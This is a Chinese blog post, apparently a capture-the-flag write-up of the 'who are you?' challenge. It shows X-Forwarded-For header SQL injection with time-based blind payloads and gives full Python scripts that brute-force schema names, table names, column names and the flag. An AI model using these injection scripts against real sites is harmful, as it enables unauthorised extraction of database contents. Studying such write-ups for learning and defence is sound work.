实验吧 who are you? By Assassin 时间盲注

最新推荐文章于 2024-08-07 21:53:08 发布
最新推荐文章于 2024-08-07 21:53:08 发布
阅读量6.8k 收藏 3
点赞数
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/54773769
版权

说真的这是我第一次接触时间盲注,而且这还是简单的时间盲注…不过感觉题目还是有一定难度的。

首先我们看到原始网页显示your ip is :xxx.xxx.xxx.xxx。然后可以联想是http头注入,当然了我之前只会X-FORWARDED-FOR,查看资料貌似还可以用:

Client-IP
x-remote-IP
x-originating-IP
x-remote-addr

但是这里当然是还是用X-FORWARDED-FOR了,嗯!

用burp试验一下
这里写图片描述

然后发现无论怎么搞都是原封不动的返回回来,瞬间蒙蔽…报错注入估计是指望不上了…

这里写图片描述

而且发现一个有趣的现象,逗号被隔断了

这里写图片描述

这种情况应该是只需要查找一项就行了吧,猜测是把字符串截断一下人后去查询吧,但是我还是不会…

么办法查一下大牛有没有什么思路吧…

原来是时间盲注!

然后想到了用暴力法去找到他得库名,表明,字段名和内容!具体就死超时判断法,用到了select case when then具体的可以上网查一下,具体实现的方法就是暴力匹配每一个字符,如何匹配了让他sleep一段时间,在get请求的时候设置一个超时去判断是否匹配成功直接看代码吧~

暴力求数据库名

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for database_number in range(0,100):        #假设爆破前100个库
    databasename=''
    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            #print 'trying ',str
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                databasename+=str
                flag=1
                print '正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename
                break
        if flag==0:
            break
    database.append(databasename)
    if i==1 and flag==0:
        print '扫描完成'
        break

for i in range(len(database)):
    print database[i]

这里写图片描述

这里用到了information_schema中schemata这表,嗯

暴力求表名
这里面需要提前知道,有information_sechma和web4,第一个在我的电脑上是有59列,但是也不知道他有几个…所以写个小脚本跑一下

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,500):   
    print 'trying',table_number
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        print table_number
        break

可以得到有42个列…有点多啊…不过呢我们一般猜测都在最后把,前面的应该都是什么information_schema里的那个。尝试一下:

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
tables=[]

for table_number in range(41,42):           #假设从第60个开始
    tablename=''
    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                tablename+=str
                flag=1
                print '正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename
                break
        if flag==0:
            break
    tables.append(tablename)
    if i==1 and flag==0:
        print '扫描完成'
        break

for i in range(len(tables)):
    print tables[i]

这里写图片描述
我说什么来着,就是他了。

暴力求列名
其实直接猜是不是flag啊…不过还是可以暴力,因为是上面列的最后一个嘛,所以关键字段肯定也是最后一个吧,老思路,看有几个列,然后暴力最后一个

看有几个列

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,1000):  
    print 'trying',table_number
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        print table_number
        break

有483列

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
columns=[]

for column_number in range(482,483):            #假设从第60个开始
    cloumnname=''
    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            #print 'trying',str
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                cloumnname+=str
                flag=1
                print '正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname
                break
        if flag==0:
            break
    columns.append(cloumnname)
    if i==1 and flag==0:
        print '扫描完成'
        break

for i in range(len(columns)):
    print columns[i]

这里写图片描述

然后暴力就行了!

#-*-coding:utf-8-*-
import requests
import string
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess=string.lowercase + string.uppercase + string.digits
flag=""

for i in range(1,100):
    havetry=0
    for str in guess:
        headers={"x-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}
        try: 
            res=requests.get(url,headers=headers,timeout=6)
        except requests.exceptions.ReadTimeout, e:
            havetry=1
            flag = flag + str
            print "flag:", flag
            break
    if havetry==0:
        break
print 'result:' + flag

真是好题~

Assassin__is__me
关注
专栏目录
实验吧 因缺思汀的绕过 By Assassin(with rollup统计)
Assassin
01-29 7375
这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!<?php error_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
SniperOJ Web by Assassin
Assassin
09-02 3127
md5-vs-injection好久不做题了 肯定是文件泄露了,猜测容易得到index.phps泄露文件,然后看一下是啥<?php $flag = 'SniperOJ{********************}'; if(isset($_POST['password'])){ $current_password = "QNKCDZO"; $password
who are you?-实验
Xi4or0uji
05-26 1615
who are you?这道题点开看见your ip is :xxx.xxx.xx.xxx然后试了巨久改ip,改了一堆了还是撤都没有然后看了大佬的wp的说是时间盲注,试了一下,确实有延迟,然后就用脚本进行时间盲注了爆数据库#-*-coding:utf-8-*- #暴力数据库 import requests import string url = "http://ctf5.shiyanbar.com...
SQL注入---时间盲注
最新发布
ningwangh的博客
08-07 1059
时间盲注使用的优先级并不高,通常是在联合注入、报错注入、布尔盲注都无法使用时才会考虑,希望这篇文章能带给你帮助。
实验吧 who are you
windseraph2的博客
04-30 1587
http://www.shiyanbar.com/ctf/1941 题目: 我要把攻击我的人都记录db中去! 格式ctf{} 打开网页发现显示的是本机IP 猜测的是IP伪装 1.尝试各种IP伪装 X-Forwarded-For Client-IP x-remote-IP x-originating-IP x-remote-addr 2.用AWVS扫
实验吧-who are you?
一个安全研究员
06-28 2823
拿到这一题,根据提示域页面显示的ip,很多小伙伴们肯定猜到了这是一道http头注入,且是与ip相关的,与ip相关的头常见的有: Client-IP x-remote-IP x-originating-IP x-remote-addr x-forwarded-for 最常见的可能就是X-Forwarded-For了吧,所以我直接试了一下,将它的值修改为127.0.0.1,页面上的显示也跟...
Interval-Assassin:jQuery 插件,可根据指定的时间间隔轻松删除指定容器中所有出现的类
06-30
【Interval-Assassin】是一款基于jQuery的插件,其主要功能是允许开发者设定一个时间间隔,在这个间隔结束后,自动从指定的DOM容器中移除特定的类。这个插件的使用非常方便,对于需要周期性地更新页面元素状态或执行...
Assassin's Creed Valhalla Wallpaper AC NewTab-crx插件
04-07
assassin的Creed Valhalla新标签是带有AC Valhalla壁纸的自定义纽特拉布。 为刺客的信条Valhalla粉丝制作的主题。 安装我的assassin的Creedvalhalla新标签,在自定义开始页面上享受各种各样的HD AC Valhalla壁纸。 ...
class Assassin.docx
01-02
在给定的代码中,我们看到了两个Python类的定义:`Assassin` 和 `Master`。这两个类代表了游戏中的角色,每个角色都有特定的属性和能力。让我们深入了解一下这些类以及它们所体现的面向对象编程概念。 首先,`...
实验吧 WEB Who are you?
fr4granc3
02-14 963
知识点 时间盲注 解题步骤 爆出当前使用的数据库名: #-*-coding:utf-8-*- import requests import string url = &amp;amp;quot;http://ctf5.shiyanbar.com/web/wonderkun/index.php&amp;amp;quot; guess = string.ascii_lowercase+string.ascii_uppercase+string.digi...
Burp半自动时间盲注
XunanSec的博客
05-25 777
0x00 直接开始 实战中碰到延时的注入点,一个一个测太麻烦,Python脚本又不会写,那我们就善用Burp。 首先要构造好注入语句,接着使用Burp抓包 发送到爆破模块 去掉所有变量,设置两个变量 第一个是数据库的名字位,第二个是数据库名字符对应的ASCII码 爆破两个变量 选择Cluster bomb模式 设置payload 第一个Payload是数据库的名字位 一共有5位,那么我们设置1~5即可 第二个Payload是数据库名字对应的ASCII码,ASCII码最大
探索与实践:CTF_web - 网络安全学习平台的技术解析
gitblog_00069的博客
04-14 408
探索与实践:CTF_web - 网络安全学习平台的技术解析 项目地址:https://gitcode.com/wonderkun/CTF_web 项目简介 CTF_web 是一个由WonderKun开发的在线平台,专注于网络安全领域的学习和实践。这个开源项目的目标是帮助初学者和有经验的网络安全爱好者提升他们的Web安全技能,通过解决一系列精心设计的实战挑战。 技术分析 CTF(Capture Th...
CTF整理】Who are you (2017强网杯web题)
SunnyCat
04-20 1613
CTF整理】Who are you (2017强网杯web题) 别人思路总结: 0x01 初探 打开网页就是一句“Sorry. You have no permissions.” 按照惯例看看网页源码,发现没有提示; 0x02 初步思考 既然没有提示,也没有其他的链接,那么可能有以下几种可能: 1、敏感文件泄漏 2、跳转 3、cookie / session 第一个想法在经过扫描器扫描之后就放弃...
[CTF]No.0006 [强网杯] Who are you
林毅洋
09-13 1764
[CTF]No.0005 [强网杯] Who are you来源:强网杯-第二届-WEB 类别:base64 rot13 php上传漏洞 来源:https://gdqwb2017.ichunqiu.com/competition/index 用到工具:无 尝试进入地址,发现只显示Sorry. You have no permissions. 查看源码,没有收获。接着,查看cookies
实验CTF-Who are you?
ncafei的博客
03-13 5475
原文地址   http://www.jianshu.com/p/5d34b3722128 Who are you http://www.shiyanbar.com/ctf/1941 题目: 我要把攻击我的人都记录db中去! 格式ctf{} 解题: 访问链接,页面显示your IP is XX.XX.XX.XX,知道这是一个关于IP伪造。 尝试
who are you-实验吧1
Gunther的博客
09-03 3097
who are you 参考了各处blog:发现只有这个链接可以求出flag 在看看求不出来的链接的内容: 简书 作者:Ovie #-*-coding:utf-8-*- import requests import string url="http://ctf5.shiyanbar.com/web/wonderkun/index.php" guess='abcdefghijklmn
CTF实验吧-who are you?【基于sleep盲注脚本】
Sp4rkW的博客
07-21 5624
原题链接:http://ctf5.shiyanbar.com/web/wonderkun/index.php 首先打开链接看到显示your ip is : xxx 首先想到这个题目与ip有关系,即与X-Forwarded-For存在一定关系 实验了一下,这里使用了google的Modify-http-headers插件进行修改ip为127.0.0.1,发现链接打开显示确实改变了,但是依旧...
CTF writeup -who are you?
一个潜心学习的小白
07-29 2937
题目为:who are you? 描述为:我是谁,我在哪,我要做什么? 首页内容为:Sorry. You have no permissions.此时推断本题与cookie有关(50%的可能性)。查看cookie,发现cookie中有一个名为role的数据(此时可以推断此题有90%的可能性与此有关)。 此时看role的值一定是明文加密后生成的。这时就Google或百度在线解码,首...
Templar Assassin
04-02
Templar Assassin is a hero in the popular online multiplayer game Dota 2. She is a melee agility hero with excellent burst damage and mobility, making her a formidable assassin. Her abilities include ...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值